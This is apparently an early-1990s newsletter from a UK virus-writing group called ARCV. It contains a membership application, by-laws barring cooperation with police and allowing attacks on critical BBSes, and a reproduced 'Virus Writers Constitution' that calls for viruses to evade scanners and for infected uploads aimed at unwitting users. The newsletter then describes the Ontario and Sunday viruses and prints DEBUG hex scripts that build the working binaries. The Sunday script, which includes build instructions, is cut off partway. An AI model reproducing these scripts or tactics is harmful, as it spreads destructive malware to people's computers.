Home Data Number (Area Code and Number): + + _______________________________________________________ + + 8. Fidonet Contact address (full address, including name to contact): + + _______________________________________________________ + + _______________________________________________________ + + 9. Age:__________ Date of Birth:_________________________ + + 10. Marital Status: ___ Married ___ Separated + + ___ Single ___ Divorced + + 11. Nationality __________________________________________ + + 12. Have you at any time used a virus? YES/NO ____________ + + If Yes, explain: _____________________________________ + + ______________________________________________________ + + ______________________________________________________ + + 13. Have you at any time been the victim of a virus attack? + + YES/NO _________________ + + If yes, explain: _____________________________________ + + ______________________________________________________ + + ______________________________________________________ + + + Part B: Legal Information + + + 1. Have You ever been convicted in any court of a crime + punishable by imprisonment for a term exceeding 1 year? + + No _____ + + Yes ____ If yes, explain: _____________________________ + + _______________________________________________________ + + _______________________________________________________ + + 2. Are you currently on Probation,Parole,a Work-Release Program + or Released on Personal Recognizance or Bond Pending Court Action? + + No _____ + + Yes ____ If yes, explain: ______________________________ + + _______________________________________________________ + + _______________________________________________________ + + 3. Are you Now or ever have been a member of any form of + Law Enforcement Agency, Such as: FBI,Secret Service,NSA, + CIA,BATF,State or Local Police,Special Branch etc.? 
+ + No _____ + + Yes ____ If yes, explain: _____________________________ + + _______________________________________________________ + + _______________________________________________________ + + 4. Are you Now or ever have been a member of any form of + group that investigates the Computer Underground? + Such as: Software Publishers Association,etc. + + No _____ + + Yes ____ If yes, explain: _____________________________ + + _______________________________________________________ + + _______________________________________________________ + + 5. Do you belong To any Organized Computer Club or Group? + + No _____ + + Yes ____ If yes, explain: _____________________________ + + _______________________________________________________ + + _______________________________________________________ + + + Part C: ARCV Information + + + 1. Are you applying to be: + + An ARCV Member __________ + + An ARCV Courier __________ + + Both __________ + + 2. If applying to be a member, Explain in detail your reason for wanting + to be a member of the ARCV. + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + _____________________________________________________________________ + + 3. What kind of position do you wish to hold in the ARCV? 
+ + ____________________________________________________________________ + + ____________________________________________________________________ + + ____________________________________________________________________ + + Part D: Qualifications + + 1. Which Programming languages do you know WELL? (Place X in Boxes) + + [ ] Assembler + [ ] Basic + [ ] Cobol + [ ] C (Turbo, Ansi) + [ ] Fortran + [ ] Pascal (Turbo, Others) + + 2. Which Programming languages are you familiar which (Place x in Boxes) + + [ ] Assembler + [ ] Basic + [ ] Cobol + [ ] C (Turbo, Ansi) + [ ] Fortran + [ ] Pascal (Turbo, Others) + + 3. Have you ever written a virus? (No Trojans Please) + + No _______ + + Yes ______ If yes, explain: ___________________________ + + _______________________________________________________ + + _______________________________________________________ + + _______________________________________________________ + + 4. If you answered NO to the above DON'T answer this... + Has the virus you've written in the Public Domain? + (ie. Is it released?) + + No _______ + + Yes ______ If yes, explain: ___________________________ + + _______________________________________________________ + + _______________________________________________________ + + _______________________________________________________ + + 5. If you've written a virus are you willing for it to be placed in our + virus library? + + No _______ + + Yes ______ + + 6. Do you have a virus collection? 
+ + No _______ + + Yes ______ If yes, explain (Please included number in collection) + + _______________________________________________________ + + _______________________________________________________ + + _______________________________________________________ + + ________________________________________________________ + + ARCV By-Laws: +--------------------------------------------------------------------------- + Section 1A-1 + + ALL MEMBERS OF THE ARCV MUST SUBSCRIBE TO THE HACKERS ETHIC AS DEFINED + BY THE EARLY CRAFTERS OF THE ART. (See Appendix A) ALSO YOU MUST SUBSCRIBE + TO THE VIRUS WRITERS CONSTITUTION. (See Appendix B) +--------------------------------------------------------------------------- + Section 1a-2 + + DEFENSE OF COPARTICIPANTS IN OFFENSE WITH A COMPUTER + + In any prosecution for any Crime under Law, in which the member was not + the only participant, it shall be recognized that no ARCV + member shall provide information on any current ARCV member to any + member of the Media or Law Enforcement Agencies. + +--------------------------------------------------------------------------- + Section 1a-3 + + USE OF DEADLY HACKING FORCE + + Except as provided in these sub-sections, No ARCV member shall ever damage + delete or in any way tamper with a computer network or system. + + Exception 1a-3-1 : Any BBS or system posting or providing Anti-ARCV + propaganda may be crashed or deleted. + + Exception 1a-3-2 : Any BBS or system posting or providing any ARCV members + phone numbers,Password, or personal information may be + crashed or deleted. + + Exception 1a-3-3 : Any system so approved by the ARCV Council. + +--------------------------------------------------------------------------- + + Section 1a-4 + + DISCLOSURE OF PROPRIETARY INFORMATION + + No ARCV member shall distribute confidential ARCV information. 
+ This shall include: Disks,Programs,Files,Passwords or Codes,Paperwork, + Manuals,Documents to any Non ARCV member,Media Member, or Law Enforcement + Agency, Without the prior permission of the ARCV Council. + +--------------------------------------------------------------------------- + + Section 1a-5 + + CONTRIBUTION OF INFORMATION + + All ARCV Members are expected to contribute to the ARCV as a whole, and + to provide information obtained on their own. Members shall not just + use information provided by other members or non-members. + +--------------------------------------------------------------------------- + + Section 1a-6 + + DISCLOSURE OF MEMBERSHIP + + All ARCV members will not allow any Non-member to use his/her password, + ID,Handle or name. And No member shall post or provide any members name + password or phone number on any computer system without the prior consent + of said member. All members will leave his/her name or phone number on a + system or network at their own discretion and risk. + +--------------------------------------------------------------------------- + + APPENDIX A: + + 1. All Information should be FREE! + + 2. Promote Decentralization - Mistrust Authority + + 3. Access to computers should be unlimited and Total + + 4. Hackers should be judged by their hacking ability + + 5. You can create art and beauty on a computer + + 6. Computers can change your life for the better. +___________________________________________________________________________ + + APPENDIX B: *** + + The Constitution of Worldwide Virus Writers + + Initial Release - February 12, 1992 + + + ARTICLE I - REGARDING ORIGINAL VIRII + Section A - DEFINITION + The term "original virus" herein indicates programming done + exclusively by either one individual or group, with no code + taken from any other source, be it a book or another virus. 
+ Section B - CODE REQUIREMENTS + For an original virus to conform to the standards set by + this document, it must include the following: + 1) The title of the virus in square brackets followed by a + zero byte should be in the code, in a form suitable for + inclusion into SCAN(1). This is to ensure that the + name of the virus is known to those examining it. + 2) The name of the author and his/her group affiliation/s + should be included in the code, followed by a zero + byte. At the present, this is an optional requirement. + 3) Some form of encryption or other form of stealth + techniques must be used. Even a simple XOR routine + will suffice. + 4) If the virus infects files, the code should be able to + handle infection of read only files. + 5) It must have some feature to distinguish it from other + virii. Creativity is encouraged above all else. + 6) The virus must not be detectable by SCAN. + Section C - IMPLEMENTATION + This section, and all sections hereafter bearing the heading + "IMPLEMENTATION" refer to the recommended method of + implementation of the suggestions/requirements listed in the + current article. + 1) Virus_Name db '[Avocado]',0 + 2) Author db 'Dark Angel, PHALCON/SKISM',0 + + ARTICLE II - REGARDING "HACKED" VIRII + Section A - DEFINITION + The term "hacked virus" herein refers to any virus written + by either one individual or a group which includes code + taken from any other source, be it a book, a code fragment, + or the entire source code from another virus. + The term "source virus" herein refers to the virus which + spawned the "hacked virus." + Section B - CODE REQUIREMENTS + For a "hacked" virus to conform to the standards set forth + by this document, it must include the following, in addition + to all the requirements set down in Article I of this + document: + 1) The title, author (if available), and affiliation of + the author (if available) of the original virus. 
+ 2) The author of the hacked virus must give the source + code of said virus to the author of the source virus + upon demand. + 3) No more Jerusalem, Burger, Vienna, Stoned, and Dark + Avenger hacks are to be written. + 4) The source virus must be improved in some manner + (generally in efficiency of speed or size). + 5) The hacked virus must significantly differ from the + source virus, i.e. it cannot be simply a text change. + Section C - IMPLEMENTATION + 1) Credit db 'Source stolen from Avocado by Dark Angel of + PHALCON/SKISM',0 + ARTICLE III - REGARDING VIRAL STRAINS + Section A - DEFINITION + The term "viral strain" herein refers to any virus written + by the original author which does not significantly differ + from the original. It generally implies a shrinking in code + size, although this is not required. + Section B - CODE REQUIREMENTS + For a "viral strain" to conform to the standards set by this + document, it must include the following, in addition to all + the requirements set down in Article I of this document: + 1) The name of the virus shall be denoted by the name of + the original virus followed by a dash and the version + letter. + 2) The name of the virus must not change from that of the + original strain. + 3) A maximum of two strains of the virus can be written. + Section C - IMPLEMENTATION + 1) Virus_Name db '[Avocado-B]',0 + + ARTICLE IV - DISTRIBUTION + Section A - DEFINITION + The term "distribution" herein refers to the transport of + the virus through an infected file to the medium of storage + of a third (unwitting) party. + Section B - INFECTION MEDIUM + The distributor shall infect a file with the virus before + uploading. Suggested files include: + 1) Newly released utility programs. + 2) "Hacked" versions of popular anti-viral software, i.e. + the version number should be changed, but little else. + 3) Beta versions of any program. + The infected file, which must actually do something useful, + will then be uploaded to a board. 
The following boards are + fair game: + 1) PD Boards + 2) Lamer boards + 3) Boards where the sysop is a dick + No virus shall ever be uploaded, especially by the author, + directly to an antivirus board, such as HomeBase or + Excalibur. + Section C - BINARY AND SOURCE CODE AVAILABILITY + The binary of the virus shall not be made available until at + least two weeks after the initial (illicit) distribution of + the virus. Further, the source code, which need not be made + available, cannot be released until the latest version of + SCAN detects the virus. The source code, should it be made + available, should be written in English. + Section D - DOCUMENTATION + Documentation can be included with the archive containing + the binary of the virus, although this is optional. The + author should include information about the virus suitable + for inclusion in the header of VSUM(2). A simple + description will follow, though the author need not reveal + any "hidden features" of the virus. Note this serves two + purposes: + 1) Enable others to effectively spread the virus without + fear of self-infection. + 2) Ensure that your virus gets a proper listing in VSUM. + ARTICLE V - AMENDMENTS + Section A - PROCEDURE + To propose an amendment, you must first contact a + PHALCON/SKISM member through one of our member boards. + Leave a message to one of us explaining the proposed change. + It will then be considered for inclusion. A new copy of the + Constitution will then be drafted and placed on member + boards under the filename "PS-CONST.TXT" available for free + download by all virus writers. Additionally, an updated + version of the constitution will be published periodically + in our newsletter. + Section B - AMENDMENTS + None as of this writing. + + ARTICLE VI - MISCELLANEOUS + Section A - WHO YOU CAN MAKE FUN OF + This is a list of people who, over the past few years, have + proved themselves to be inept and open to ridicule. + 1) Ross M. 
Greenberg, author of FluShot+ + 2) Patricia (What's VSUM?) Hoffman. + 2) People who post "I am infected by Jerusalem, what do I + do?" or "I have 20 virii, let's trade!" + 3) People who don't know the difference between a virus + and a trojan. + 4) Lamers and "microwares puppies" + Section B - WHO YOU SHOULDN'T DIS TOO BADLY + This is a list of people who, over the past few years, have + proved themselves to be somewhat less inept and open to + ridicule than most. + 1) John McAfee, nonauthor of SCAN + 2) Dennis, true author of SCAN + Section C - MOTIVATION + In most cases, the motivation for writing a virus should not + be the pleasure of seeing someone else's system trashed, but + to test one's programming abilities. + + + + + 1 SCAN is a registered trademark of McAfee Associates. + 2 VSUM is a registered trademark of that bitch who doesn't know her own + name. +___________________________________________________________________________ + + For those applying for courier membership if we feel you are suitable we + will be in touch to discus the extra details. The usual first contact + will be by means of a Fidonet address or a written letter. + + For those applying for normal membership then will contact you at your + Fidonet address, with the extra details of the membership and a list of + board that's we can be contacted through. +___________________________________________________________________________ + + FALSE STATEMENT: A person is guilty of False Statement when he/she + Intentionally makes a false statement under oath or + pursuant to a form bearing Notice. + + You are here to fore-warned... + + FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! + + + I agree to the By-Laws and statements put forth on this document + + NAME: _______________________________ + + DATE: _______________________________ + + To return your Application please return to Apache Warrior. Through E- +Mail on any Flashback BBS or the BBS where you got this from. 
+ + Please fill in the Machine Configuration data sheet and return to the + above address. + +*** + PS. Thanks to PHALCON/SKISM for preparing the Virus Writers Constitution. +*** + +--------------------------------------------------------------------------- +The ARCV'92 +May the Great A'Tuin keep going........ +--------------------------------------------------------------------------- + + Well that's the Application form next is the machine spec. form. This +gives us an indication of the kind of computer system you run. + +--------------------------------------------------------------------------- +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + /////// //////// ///////// // // + // // // // // // // + /////// /////// // // // + // // // // // // // + // // * // // * ///////// * /// + + + THE + ASSOCIATION + OF REALLY + CRUEL + VIRUSES + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + + The Association of Really Cruel Viruses. + + Machine Configuration Form. + + Please fill in all the questions truthfully as they will help us decide +what you can offer our group. +___________________________________________________________________________ + + + 1. Date of Application:__________________________________ + + 2. Applicants Name (Last,First,Middle,Maiden): + + ______________________________________________________ + + 3. Applicants Current Handle:____________________________ + + 4. Machine Type. (Place an X in the boxes appropriate) + + [ ] IBM PC. + [ ] AMIGA. + [ ] ATARI ST. + [ ] MAC. + [ ] ARCHIMEDES. + [ ] OTHER, (Please State). + + 5. If you answered IBM PC to the above please answer below. What type + of IBM PC do you have. + + [ ] 8086/88 Based + [ ] 80286 Based + [ ] 80386 (SX/DX) Based + [ ] 80486 (SX/DX/DX2) Based + [ ] PS/2 + + 6. If you have a machine other than that of an IBM PC please state + processor type and manufacturer. 
+ + _______________________________________________________________ + + _______________________________________________________________ + + _______________________________________________________________ + + 7. Do you have any of the following equipment. + + [ ] Hard Disk, enter size and type: ______________________________ + + ______________________________________________________________ + + [ ] Modem, enter model and max speed: ____________________________ + + ______________________________________________________________ + + [ ] Printer + [ ] 9 pin Dot Matrix + [ ] 24 pin Dot Matrix + [ ] Laser Printer + [ ] Ink Jet type + [ ] Colour + + [ ] Monochrome Display. + [ ] CGA Display, or equivalent. + [ ] EGA Display, or equivalent. + [ ] VGA Display, or equivalent. + [ ] SVGA Display, or equivalent. + + [ ] 5 inch 360K floppy. + [ ] 5 inch 1.2Mb floppy. + [ ] 3 inch 720Kb floppy. + [ ] 3 inch 1.44Mb floppy. + [ ] Other Please State: __________________________________________ + + 8. What Kind of Anti-Virus Software do you use: + + _______________________________________________________________ + + _______________________________________________________________ + + 9. Do you believe in Virus Research? YES/NO _______________________ + + 10. Do you Hack? YES/NO ___________________________________________ + + 11. If so what kind of Systems? ___________________________________ + + _______________________________________________________________ + + 12. Do you run a BBS? YES/NO ______________________________________ + + 13. If so please state BBS configuration. inc. Software, Machines. + + _______________________________________________________________ + + _______________________________________________________________ + + _______________________________________________________________ + + _______________________________________________________________ + + _______________________________________________________________ + + 14. 
If you have a BBS are you willing for us to us it? YES/NO _____ + +___________________________________________________________________________ + + This all for now and we may ask further questions regarding your computer + setups. Thank you for your time. +___________________________________________________________________________ + + FALSE STATEMENT: A person is guilty of False Statement when he/she + Intentionally makes a false statement under oath or + pursuant to a form bearing Notice. + + You are here to fore-warned... + + FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!! + + + I agree to the statements put forth on this document + + NAME: _______________________________ + + DATE: _______________________________ + + To return your Machine Configuration data sheet please return to Apache +Warrior. Through E-Mail on any Flashback BBS or the BBS where you got this +from. + +--------------------------------------------------------------------------- +The ARCV'92 +Octarine - The Pigment of Imagination...... +---------------------------------------------------------------------------ARCV NEWS 003. + + The Association of Really Cruel Viruses. + + + This is one of the first English Computer Underground groups, although +we are an English organisation we can only be contacted through American or +Eastern Europe Virus boards. Or we will contact through a Fidonet address. + + What is The ARCV. + + ARCV is a organisation that is involved in Writing and Research of +computer viruses. We hold a Library of IBM Computer viruses for the use of +the ARCV members. But as a group we are involved in viruses for most the +main computer types (IBM PC, AMIGA, ST, MAC). We have a Bi-Monthly +newsletter with the latest virus news from around the country and from +around the world, virus Dis-Assemblies and other virus Debug Scripts. We +have links with PHALCON/SKISM in the US, we also have links with some +Eastern Europe Virus writers. 
Are group is not only limited to virus +activities but other 'Underground' activities also (Hacking, Phreaking +etc.) so any new members who don't write viruses could be involved in any +of the other activities we are involved in. + + Are members come from the youths of today, at the moment we are mainly +English students that wish to beat and know more about the system. We come +from a range of backgrounds from the Electronics side and the Computer +side, I myself Apache Warrior come mainly from the Electronics side but +branched to the Computer side fully around 2 years ago. I Hack, Phreak and +write Viruses, I am the President of the group (after all I started the +group) and I am some what of an expert on beating the BT phone exchange and +being a BBS A HOLIC that comes in very handy. Now ICE-9 is also a +Electronics guy who turned to the computer he writes viruses and is into +Heavy Metal. Now the picture put out by the Anti-Virus Authors is that +Virus writers are Sad individuals who wear Anoraks and go Train Spotting +but well they are sadly mistaken, we are very intelligent, sound minded, +highly trained, and we wouldn't be seen in an Anorak or near an Anorak even +if dead. + + We aim to provide the ARCV members and some Non-Members an insight to +the computer underground world and would you believe it is huge. The Group +is always seeking new members and we require new members to stay afloat, +soon we will be opening the world HQ in the UK this will have special +access areas for the ARCV members these will include access to the ARCV +Virus Library, all of which are legit viruses and No Trojans.ARCV NEWS 004. + + The Ontario Virus + + Well heres a virus from Canada. 
+ + V Status: Rare + Discovered: July, 1990 + Symptoms: .COM & .EXE growth; decrease in system and free memory; + hard disk errors in the case of extreme infections + Origin: Ontario, Canada + Eff Length: 512 Bytes + Type Code: PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector + Detection Method: ViruScan V66+, Pro-Scan 2.01+, NAV + Removal Instructions: SCAN /D, or Delete infected files + General Comments: + The Ontario Virus was isolated by Mike Shields in Ontario, Canada in + July, 1990. The Ontario virus is a memory resident infector of .COM, + .EXE, and overlay files. It will infect COMMAND.COM. + + The first time a program infected with the Ontario Virus is executed, + it will install itself memory resident above the top of system memory + but below the 640K DOS boundary. Total system memory and free memory + will be decreased by 2,048 bytes. At this time, the virus will infect + COMMAND.COM on the C: drive, increasing its length by 512 bytes. + + Each time an uninfected program is executed on the system with the + virus memory resident, the program will become infected with the viral + code located at the end of the file. For .COM files, they will + increase by 512 bytes in all cases. For .EXE and overlay files, the + file length increase will be 512 - 1023 bytes. The difference in + length for .EXE and overlay files is because the virus will fill out + the unused space at the end of the last sector of the uninfected file + with random data (usually a portion of the directory) and then append + itself to the end of the file at the next sector. Systems using a + sector size of more than 512 bytes may notice larger file increases + for infected files. Infected files will always have a file length + that is a multiple of the sector size on the disk. + + In the case of extreme infections of the Ontario Virus, hard disk + errors may be noticed. 
+ + Ontario uses a complex encryption routine, and a simple identification + string will not identify this virus. + +--------------------------------------------------------------------------- +n ontario.com +e 0100 E9 1D 00 1D 66 65 63 74 65 64 20 50 72 6F 67 72 +e 0110 61 6D 2E 20 0D 0A 24 BA 02 01 B4 09 CD 21 CD 20 +e 0120 90 E8 E9 01 93 84 7B D9 F8 69 7C 3C 84 7B B6 A5 +e 0130 71 60 0F CB 65 B7 BB 0A A3 07 55 97 7F 86 BE 9A +e 0140 FF 84 55 0D E5 84 79 AA F7 1A 79 86 F7 47 30 0A +e 0150 A0 05 55 87 7B 04 7B 25 69 84 56 04 7B 27 69 84 +e 0160 F5 44 75 9B F0 71 48 7B C2 80 79 78 88 20 F5 5D +e 0170 81 43 7D 00 7B FB 7B 27 FD 84 80 3C 84 CF B6 A5 +e 0180 64 9A 7C 8F 96 F0 77 09 CD FF 7B 3B 7B 85 2C 78 +e 0190 DE 21 B8 08 BB AA 7A 82 06 84 91 6F 6E CD 15 B9 +e 01A0 84 7B 0E 86 3B 4B FB 78 30 F1 6F B8 78 F0 6B B8 +e 01B0 84 F1 72 8A 64 3E A6 85 93 8D 7B 4B 93 81 7B AA +e 01C0 84 AA 7B 86 7D 9A 29 D5 28 D4 C3 84 38 6C 5D 85 +e 01D0 09 9C 8D 45 7A F0 70 04 9A 7A C3 85 38 6C 6D 85 +e 01E0 09 8C C3 86 46 6C 75 85 08 87 92 86 7A 0F A3 8A +e 01F0 64 3C 7B D3 93 7B 7B 0D 75 80 79 0D 6D 82 79 3E +e 0200 73 86 C2 9F 7B 30 44 6C 97 84 09 CC FA BA 73 86 +e 0210 36 DE 0F BD DB 8D 79 BE 7D 8F 79 F0 4C B7 A9 B7 +e 0220 B2 3C 79 C6 93 4B 7B F6 50 B9 7B 64 0C A2 2B 25 +e 0230 73 86 D8 FF 7B 25 71 86 D8 F9 7B DC 56 87 7B 42 +e 0240 7D 8C 79 6D D8 8D 79 26 70 86 90 CD EB 07 45 98 +e 0250 79 85 0E 87 92 01 7B 25 77 86 C2 84 79 73 9A D4 +e 0260 29 35 7F 57 B1 57 93 87 B9 AF 7D 94 79 D4 DA 98 +e 0270 79 27 00 84 DA 9A 79 81 6B 84 D8 F9 7B DC D8 9A +e 0280 79 43 7D 98 79 85 7B 7B 7D 88 79 DD 21 3C 7B C6 +e 0290 93 E7 7B F6 3C 04 4D 7C 7A 8C 48 44 F5 5C DB E8 +e 02A0 7F 8A 64 8A 7C 26 97 85 48 72 C4 A0 79 D3 C2 84 +e 02B0 79 78 88 20 C5 AC 79 6C 21 84 21 3D 7B 86 CF C4 +e 02C0 93 B7 7B F6 6C B7 B2 B7 A9 3C 7B C6 93 A3 7B F6 +e 02D0 70 3E 73 86 C2 9F 7B 30 3B 6C 61 84 F0 92 7D 86 +e 02E0 F0 8A 7F 86 C3 85 2C 6C 77 84 CF BA 93 83 7B DC +e 02F0 20 DD 21 9B 7C 47 E7 AA 84 9A 7B 86 B8 C7 41 D8 
+e 0300 38 CB 36 C9 3A CA 3F AA 38 CB 36 84 84 5E 56 2E +e 0310 8A 84 E8 01 B9 E8 01 F6 D0 2E 30 04 46 E2 F8 C3 + +rcx +220 +w +q + +--------------------------------------------------------------------------- +Apche.. +ARCV NEWS 005. + + The Sunday Virus + + According to Patty Hoffman, the Sunday virus is based on the Jerusalem +viruses, because the codes for both viruses are similar. Sunday infects +COM, EXE, and OVL files, when they are executed, and it stays resident in +memory. It was circulated around the Seattle, Washington area in 1989, and +is very common. + + How ever this version of Sunday doesn't seem to print any messages on +the screen, like some of the other versions do, every Sunday. This virus +spreads rapidly, and is a great replicator. + + To create SUNDAY.COM, cut out the following code, and name the +resulting file sunday.scr. Then, use this command: DEBUG < SUNDAY.SCR +this will then produce the .COM all ready for use. + +--------------------------------------------------------------------------- +n sunday.com +e 0100 E9 92 00 59 57 C8 F7 E1 EE E7 00 01 4C 1E 00 00 +e 0110 00 02 00 AB 00 0C 13 16 17 C7 02 BF 05 3A 1E 63 +e 0120 79 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06 +e 0130 5F BD 1D 80 00 00 00 80 00 BD 1D 5C 00 BD 1D 6C +e 0140 00 BD 1D 00 0A 95 22 29 00 00 00 00 F0 02 00 4D +e 0150 5A 87 01 14 01 ED 05 80 01 23 0B FF FF 8C 20 C0 +e 0160 06 89 19 C6 00 8C 20 1E 00 00 00 00 00 00 00 00 +e 0170 05 00 20 00 29 15 01 79 00 02 10 00 C0 20 02 00 +e 0180 54 61 28 99 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 01 +e 0190 00 00 00 00 00 FC 06 B8 00 00 8E C0 26 A1 84 00 +e 01A0 07 3D 4C 02 75 10 B4 DD BF 00 01 BE C2 06 03 F7 +e 01B0 2E 8B 4D 11 CD 21 8C C8 05 10 00 8E D0 BC C0 06 +e 01C0 50 B8 C6 00 50 CB FC 06 2E 8C 06 31 00 2E 8C 06 +e 01D0 39 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10 +e 01E0 00 2E 01 06 49 00 2E 01 06 45 00 B4 FF CD 21 80 +e 01F0 FC 04 75 10 07 2E 8E 16 45 00 2E 8B 26 43 00 2E +e 0200 FF 2E 47 00 33 C0 8E C0 BB FC 03 26 8B 07 2E A3 
+e 0210 4B 00 26 8A 47 02 2E A2 4D 00 26 C7 07 F3 A5 26 +e 0220 C6 47 02 CB 58 05 10 00 8E C0 0E 1F B9 C2 06 D1 +e 0230 E9 33 F6 8B FE 06 B8 3E 01 50 FF 2E 59 06 8C C8 +e 0240 8E D0 BC C0 06 33 C0 8E D8 2E A1 4B 00 89 07 2E +e 0250 A0 4D 00 88 47 02 8B DC B1 04 D3 EB 83 C3 20 83 +e 0260 E3 F0 2E 89 1E 33 00 B4 4A 2E 8E 06 31 00 CD 21 +e 0270 B8 21 35 CD 21 2E 89 1E 17 00 2E 8C 06 19 00 0E +e 0280 1F BA 4C 02 B8 21 25 CD 21 8E 06 31 00 26 8E 06 +e 0290 2C 00 33 FF B9 FF 7F 32 C0 F2 AE 26 38 05 E0 F9 +e 02A0 8B D7 83 C2 03 B8 00 4B 06 1F 0E 07 BB 35 00 1E +e 02B0 06 50 53 51 52 B4 0F CD 10 3C 07 74 07 2E C7 06 +e 02C0 4A 02 00 B8 B8 08 35 CD 21 2E 89 1E 13 00 2E 8C +e 02D0 06 15 00 0E 1F C7 06 1F 00 E0 79 B8 08 25 BA 0A +e 02E0 02 CD 21 5A 59 5B 58 07 1F 9C 2E FF 1E 17 00 1E +e 02F0 07 B4 49 CD 21 B4 4D CD 21 B4 31 BA C2 06 B1 04 +e 0300 D3 EA 83 C2 10 CD 21 32 C0 CF 2E 83 3E 1F 00 00 +e 0310 75 22 1E 06 56 57 50 8D 36 3E 02 0E 1F A1 4A 02 +e 0320 8E C0 BF 00 00 FC A5 A5 A5 A5 A5 A5 58 5F 5E 07 +e 0330 1F EB 06 90 2E FF 0E 1F 00 2E FF 2E 13 00 48 F0 +e 0340 61 F0 21 F0 48 F0 61 F0 21 F0 00 B8 9C 80 FC FF +e 0350 75 05 B8 00 04 9D CF 80 FC DD 74 0E 3D 00 4B 75 +e 0360 03 EB 21 90 9D 2E FF 2E 17 00 58 58 B8 00 01 2E +e 0370 A3 0A 00 58 2E A3 0C 00 F3 A4 9D 2E A1 0F 00 2E +e 0380 FF 2E 0A 00 2E C7 06 70 00 FF FF 2E C7 06 8F 00 +e 0390 00 00 2E 89 16 80 00 2E 8C 1E 82 00 50 53 51 52 +e 03A0 56 57 1E 06 FC 8B FA 32 D2 80 7D 01 3A 75 05 8A +e 03B0 15 80 E2 1F B4 36 CD 21 3D FF FF 75 03 E9 0F 03 +e 03C0 F7 E3 F7 E1 0B D2 75 05 3D C2 06 72 F0 2E 8B 16 +e 03D0 80 00 1E 07 32 C0 B9 41 00 F2 AE 2E 8B 36 80 00 +e 03E0 8A 04 0A C0 74 0E 3C 61 72 07 3C 7A 77 03 80 2C +e 03F0 20 46 EB EC 2E 89 36 57 06 B9 0B 00 2B F1 BF 84 +e 0400 00 0E 07 B9 0B 00 F3 A6 75 03 E9 C2 02 2E C6 06 +e 0410 56 06 00 90 2E 8B 36 57 06 8D 3E 55 06 4F 4E 26 +e 0420 8A 05 34 BB 3C 00 74 0D 3A 04 74 F1 2E C6 06 56 +e 0430 06 01 90 EB E8 2E 80 3E 56 06 00 74 16 4F 26 80 +e 0440 3D FF 74 2B 47 2E 8B 36 57 06 
2E C6 06 56 06 00 +e 0450 90 EB CA 07 1F 5F 5E 5A 59 5B 58 33 C9 B8 01 43 +e 0460 CD 21 B4 41 CD 21 B8 00 4B 9D 2E FF 2E 17 00 B8 +e 0470 00 43 CD 21 72 05 2E 89 0E 72 00 72 25 32 C0 2E +e 0480 A2 4E 00 1E 07 8B FA B9 41 00 F2 AE 80 7D FE 4D +e 0490 74 0B 80 7D FE 6D 74 05 2E FE 06 4E 00 B8 00 3D +e 04A0 CD 21 72 7C 2E A3 70 00 8B D8 B8 02 42 B9 FF FF +e 04B0 BA FB FF CD 21 72 EB 05 05 00 2E A3 11 00 B9 05 +e 04C0 00 BA 6B 00 8C C8 8E D8 8E C0 B4 3F CD 21 8B FA +e 04D0 BE 05 00 F3 A6 74 22 B0 00 B9 00 00 BA 00 00 B4 +e 04E0 42 CD 21 8D 16 DD 05 B9 14 00 B4 3F CD 21 81 3E +e 04F0 EF 05 89 19 75 0A E9 91 01 B4 3E CD 21 E9 CF 01 +e 0500 B8 24 35 CD 21 89 1E 1B 00 8C 06 1D 00 BA 07 02 +e 0510 B8 24 25 CD 21 C5 16 80 00 33 C9 B8 01 43 CD 21 +e 0520 72 3B 2E 8B 1E 70 00 B4 3E CD 21 2E C7 06 70 00 +e 0530 FF FF B8 02 3D CD 21 72 24 2E A3 70 00 8C C8 8E +e 0540 D8 8E C0 8B 1E 70 00 B8 00 57 CD 21 89 16 74 00 +e 0550 89 0E 76 00 B8 00 42 33 C9 8B D1 CD 21 72 3E 80 +e 0560 3E 4E 00 00 74 04 EB 5B 90 90 BB 00 10 B4 48 CD +e 0570 21 73 0B B4 3E 8B 1E 70 00 CD 21 E9 51 01 FF 06 +e 0580 8F 00 8E C0 33 F6 8B FE B9 C2 06 F3 A4 8B D7 8B +e 0590 0E 11 00 8B 1E 70 00 06 1F B4 3F CD 21 72 1F 03 +e 05A0 F9 33 C9 8B D1 B8 00 42 CD 21 BE 05 00 B9 05 00 +e 05B0 1E 0E 1F F3 A4 1F 8B CF 33 D2 B4 40 CD 21 72 0D +e 05C0 E9 C7 00 B9 1C 00 BA 4F 00 B4 3F CD 21 72 4A C7 +e 05D0 06 61 00 89 19 A1 5D 00 A3 45 00 A1 5F 00 A3 43 +e 05E0 00 A1 63 00 A3 47 00 A1 65 00 A3 49 00 A1 53 00 +e 05F0 83 3E 51 00 00 74 01 48 F7 26 78 00 03 06 51 00 +e 0600 83 D2 00 05 0F 00 83 D2 00 25 F0 FF A3 7C 00 89 +e 0610 16 7E 00 05 C7 06 83 D2 00 72 3A F7 36 78 00 0B +e 0620 D2 74 01 40 A3 53 00 89 16 51 00 A1 7C 00 8B 16 +e 0630 7E 00 F7 36 7A 00 2B 06 57 00 A3 65 00 C7 06 63 +e 0640 00 C6 00 A3 5D 00 C7 06 5F 00 C0 06 33 C9 8B D1 +e 0650 B8 00 42 CD 21 72 0A B9 1C 00 BA 4F 00 B4 40 CD +e 0660 21 72 11 3B C1 75 23 8B 16 7C 00 8B 0E 7E 00 B8 +e 0670 00 42 CD 21 72 14 33 D2 B9 C2 06 B4 40 CD 21 B9 +e 0680 05 00 8D 16 
